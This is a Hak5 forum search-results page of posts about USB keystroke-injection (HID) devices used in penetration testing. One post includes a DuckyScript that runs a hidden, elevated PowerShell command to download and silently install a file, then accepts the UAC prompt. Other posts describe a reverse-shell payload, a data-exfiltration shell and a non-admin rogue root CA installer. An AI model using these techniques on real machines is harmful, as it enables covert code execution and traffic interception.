Search the Community

Showing results for tags 'HID'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 24 results

  1. In order to provide a PoC that non-administrative access can still result in huge data breaches, I present to you The Hidden PP Attack: a one-liner PoSh command that can be executed from a Teensy/Rubber Ducky which leaves the machine open to remote injection of PoSh code. Quite happy with this project, so I thought I'd drop it here. I've lurked remotely without an account for some time without contributing, so... here you are:
     https://simpleinfosec.com/2018/01/09/the-hidden-pp-attack-a-non-administrative-remote-shell-for-data-exfiltration/
     https://github.com/secsi/HIDdenPPAttack
  2. Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So... why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has finished executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo:
     • Write file (with content) to the desktop
     • Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible
     • Open calculator application
     • Message box -- powered by PowerShell
     For information about the payload, the payload script itself and how to configure it, see this GitHub repository: https://github.com/uintdev/RevShellBack
  3. Testing the Bash Bunny for use on a physical pentest/red team engagement but noticing a huge problem with using this device for a real-world assessment. Mainly, on a Windows 7 x64 desktop, the initial driver install process took over 2 minutes. After the initial drivers are installed, my payload initializes and finishes within 10 seconds, which is great if only I didn't have to install the drivers first... What makes this issue even worse is that the Bash Bunny doesn't wait until the drivers have been installed before executing the payload, which means you need to unplug/re-plug the device after waiting 2 minutes to execute the payload. Ideally, it would be nice to build some code into the Bash Bunny to automatically detect when the drivers are installed and then run the payload. Has anyone had any issues with this, and is there any way to improve the speed here? 2 minutes is wayyy too long to wait around at an unlocked workstation. I would be better off typing out the payload by hand if it meant only taking 20-30 seconds max.
  4. Hi, there is something I don't understand with the Bash Bunny... I feel like it's too hard for my brain to understand how it works compared to the Rubber Ducky, so I need some help. I have this on a Rubber Ducky; it's pretty basic and does what I want: starting an admin PowerShell, asking for admin and THEN running my command (download a file, output that file and run it quietly):
     DELAY 1500
     GUI r
     DELAY 1000
     STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn""
     ENTER
     DELAY 1000
     ALT o
     ALT y
     So what would be the best way to do that without requiring the download, because the file will be on the Bash Bunny, either inside or on the storage? THE POWERSHELL HAS TO BE ADMIN or the program won't install correctly. I can't get it to open an admin PowerShell and then get the drive letter and execute my program all on one line and ask for approval before actually installing the program (time saver). Thanks a lot
  5. Is there a way from the Bash Bunny shell to control what the Bash Bunny "does to" the host? For example, if my payload just checks the OS version, connects to a Bash Bunny shell and starts a new script based on that? As one simple example, determining Windows XP (UAC evasion not required) vs Windows 7+ could be useful. Another case might be defaulting to, and then unloading, the ECM_ETHERNET module and replacing it with the RNDIS if we detect that we are on Windows. I realize that the latter case might be better handled using the Switch to change payloads... but doing something like I'm thinking could give me, effectively, more than 2 payloads. If I'm not using the right terminology I apologize... I'm just getting started. I can't find anything by searching but I could be looking for the wrong thing... In the long run some way to control what the Bunny does based on the Host OS would be useful. Thanks!
  6. Hi, my problem is that when I tried:
     ATTACKMODE HID STORAGE
     DUCKY_LANG ca
     LED R B
     QUACK DELAY 1500
     LED B
     QUACK GUI r
     LED G
     QUACK DELAY 1000
     LED R FAST
     QUACK STRING Powershell -WindowStyle............insert the magic here
     QUACK ENTER
     LED R G B
     It stays blinking red fast... indefinitely. I tried a couple of things but I don't know, is it related to my language being bad? Because in the languages I do have all the languages...
  7. Violation of CoC
  8. I have recently found an article by Samy Kamkar regarding HID exploitation and was wondering which is better. (I understand preference, but I'm more interested in the speed and flexibility aspect of the two as well as ease of deployment.) Also, I was wondering if there was a way to turn a Teensy into a faux Rubber Ducky, in regards to making it possible to use the Rubber Ducky coding language on a Teensy?
  9. Violation of CoC
  10. Discussion Thread for Root CA installer. (No Local Admin Rights necessary) Current development via: https://github.com/jrsmile/bashbunny-payloads/tree/master/payloads/library/rooter (TESTED and Working), pull request waiting.
     Small how-to to create a self-signed root CA:
     Create the Root Certificate (Done Once)
     Creating the root certificate is easy and can be done quickly. Once you do these steps, you'll end up with a root SSL certificate that you'll install on all of your desktops, and a private key you'll use to sign the certificates that get installed on your various devices.
     Create the Root Key
     The first step is to create the private root key, which only takes one step. In the example below, I'm creating a 2048 bit key:
     openssl genrsa -out rootCA.key 2048
     The standard key sizes today are 1024, 2048, and to a much lesser extent, 4096. I go with 2048, which is what most people use now. 4096 is usually overkill (and a 4096 key length is 5 times more computationally intensive than 2048), and people are transitioning away from 1024.
     Important note: Keep this private key very private. This is the basis of all trust for your certificates, and if someone gets a hold of it, they can generate certificates that your browser will accept. You can also create a key that is password protected by adding -des3:
     openssl genrsa -des3 -out rootCA.key 2048
     You'll be prompted to give a password, and from then on you'll be challenged for the password every time you use the key. Of course, if you forget the password, you'll have to do all of this all over again.
     The next step is to self-sign this certificate.
     openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem
     This will start an interactive script which will ask you for various bits of information. Fill it out as you see fit.
     You are about to be asked to enter information that will be incorporated
     into your certificate request.
     What you are about to enter is what is called a Distinguished Name or a DN.
     There are quite a few fields but you can leave some blank
     For some fields there will be a default value,
     If you enter '.', the field will be left blank.
     -----
     Country Name (2 letter code) [AU]:US
     State or Province Name (full name) [Some-State]:Oregon
     Locality Name (eg, city) []:Portland
     Organization Name (eg, company) [Internet Widgits Pty Ltd]:Overlords
     Organizational Unit Name (eg, section) []:IT
     Common Name (eg, YOUR name) []:Data Center Overlords
     Email Address []:none@none.com
     Once done, this will create an SSL certificate called rootCA.pem, signed by itself, valid for 1024 days, and it will act as our root certificate. The interesting thing about traditional certificate authorities is that the root certificate is also self-signed. But before you can start your own certificate authority, remember the trick is getting those certs in every browser in the entire world.
  11. Violation of CoC
  12. So, I'm not sure what to make of this. Maybe it's nothing. My friend was setting up a bunch of Dells and noticed this: http://www.dell.com/support/home/us/en/04/Drivers/DriversDetails?driverId=5DD13 It looks like just another driver, but HID and BIOS got me wondering. I found this link, http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_150812_1 , that gives a better description. I couldn't find anything online about what BIOS HID commands there could be. Why would the BIOS need access to HID? If it does have access, what keys does it have, and how do computers interpret them? Could this be exploited? I honestly can't find anything else, but I thought I'd post this in case anyone knows what it actually does and can debunk my curiosity.
  13. Is there a reason why HID attacks don't use copy and paste? Like open cmd / open notepad / open txt from usb / copy / paste to cmd? Is there a possibility that AV would detect the malicious code in the clipboard? Thanks -- lost my old account - thedeadhand
  14. Hey, folks. I've tried using my LAN Turtle on a few engagements now, and while it's nice to show it plugged into a computer in the report, I rarely get much love out of it, and the shell feels too slow to be useful (guess that's why it's called a LAN Turtle! It's a really slow shell!) Anyway, the idea that I wanted to float today is whether or not it would be possible to turn the LAN Turtle into a "TwinTurtle", similar to the "TwinDuck" firmware for the USB Rubber Ducky, but in this case, the LAN Turtle would continue to be a USB-to-Ethernet adapter as well as acting as a HID device, so you could have a "blind terminal" into the machine it's physically plugged into. This could allow direct exploitation of the machine through powershell meterpreter, for example. The only problem I can think of is how to tell if the device is actually unlocked before sending the commands. So the reason I'm bringing this here is that I don't currently have the know-how to write a custom firmware which implements this sort of functionality, but I wanted to bring up the idea to the community, to see if this is something that is even possible, and if there are people willing and able to implement it.
  15. Hello Everybody! Let me introduce myself: I am new to the forum. I am going to order my Ducky in the next few days, but I have some questions.
     1. Is the only available Ducky model right now the deluxe one?
     2. What is Twin Ducky? A mod for a normal (or deluxe) Ducky?
     3. Where are the scripts stored, on the micro SD card? Can I store files on the same micro SD? (Twin Ducky is something like that, I believe.)
     5. How is the support for Spanish keyboards? Official? Is it nice?
     4. What is the Ducky encoder? Is it like a firmware for our Duckys? Can I update its firmware?
     Thanks in advance everybody! PD: Do you know any HakShop discount code, don't you? haha :P
  16. Hello everyone, I am Cr0wTom and I recently posted on my channel a video about how to implement Rubber Ducky scripts on a USB thumb drive that is vulnerable to BadUSB. I think that you will appreciate it here. I will be happy to hear your response, here or in my videos' comments. Feel free to subscribe :) Video Link: Thank you for watching!! (More videos to come)
  17. Hi to all, I am playing with this fantastic gadget and I like it very much! I ordered more than 10 USBs and all work great. I am also working on a custom firmware, so I cloned the svn repository to compile the firmwares. Currently I am working on the composite_duck firmware: Composite_Duck.zip. In this firmware I have noticed a bug... it processes only 77-90 instructions. My operations are: --> open a notepad --> write text here. The maximum length that I can write into notepad is only 77 characters. The characters/instructions are hard-coded into the firmware through the array ui_sequence. In the wiki I read that this firmware could write more than 2048 characters. Does anyone have the same problem? Could it be a problem because I don't have a "delay"? Many thanks,
  18. First, let me just say I am completely new to pen testing and such, but I am a veteran tech and I want to learn more. I recently got something in the mail that was a promotion for a new TV series. Attached to the side of a fake old 5 1/4 in floppy I noticed a USB edge connector. Printed on the side it read "Insert this into your computer to watch the first full episode now!". I thought for sure that they wouldn't give out a video on a thumb drive, so I checked it out. When I plugged it in, it acted a lot like the Rubber Ducky I've seen on Hak5 (a clever bit of marketing, I must say). I'm sure that it was coded as a HID because I saw it rapidly open the "Run" box, then type a URL to go to its website, and then I assume hit OK or Enter to execute it. My question is, can I modify this device to make it more like a Ducky? What tools would I use to explore/modify its contents? Thanks in advance, I love this forum.
  19. NEW Version 2.0 of my USB SwissKnife (Faster, Smaller and concealed, With new USB Rubber Ducky 2.0). Since Hak5 recently lowered its price on the USB Rubber Ducky, I decided it was time to update my old USB SwissKnife! So this one is quite simple: a Hak5 USB Rubber Ducky with the TwinDuck (Composite HID + Mass Storage) firmware with an 8Gb SD card + a 32Gb bootable USB drive. The bootable USB drive is exactly like the old one except that I increased from 16Gb to 32Gb... So the old one still correctly describes that portion. However, the new version of the Rubber Ducky is quite different:
     - It runs on custom hardware instead of using a Teensy.
     - It has its own scripting language.
     - It is officially supported by some penetration testing software.
     - Requires no programming skill to operate and update payloads.
     - Supports Mass Storage from the payload SD card.
     - Faster and slimmer hardware...
     So it effectively supersedes the older versions, including mine... Now, the question is: can I make it better? Well, the only downside is the speed of the USB Mass Storage, which is way too slow to use it as a bootable USB key. It is still good enough for small applications, scripts and payloads, so I'll reserve that storage space for that purpose only, which is still very useful since you can access the payload without removing the SD card. In order to add a bootable USB key to the mix, I would need to do the same thing I did on the old version, which is adding a hub... But this time I realized that I have never used both the HID attack vector and the bootable USB key at the same time, which kind of makes sense since one injects a payload into a foreign OS and the other boots an OS on a foreign machine. They are 2 different things, so why not use 2 different keys? Well, simply because I want to carry only 1 key! All that to say that this hack simply consists of putting the 2 USB devices in the same plastic package; the real hack is what you put on and do with them!
     Check OLD Version 1.0 for details about the bootable USB tools...
  20. Introducing the latest Composite Firmware - Codename: The Twin Duck. The Ducky primarily acts as a USB Mass Storage Device, and on a click of the button will start emulating a Keyboard. It's multi-OS, multi-lingual and comes in three flavours:
     • c_duck_v2.hex - Supports DuckyScript as HID payload, triggered automatically and on GPIO (limited instructions)
     • c_duck_v2_S001.hex - Triggered on CAPS/NUM/SCROLL LOCK
     • c_duck_v2_S002.hex - Triggered on Ducky's GPIO only!
     Depending on your circumstances, you may want to use either one of these available firmwares. Downloads: http://code.google.c.../downloads/list Please test and post feedback here. Snake
  21. OK, so I was looking at the new Rubber Ducky HID and I was thinking how I can make one or something like it. After seeing the video on P2P OTG I was thinking that maybe there might be a way to make an app for Android to use it as a HID/Rubber Ducky. If you have any ideas please post. :)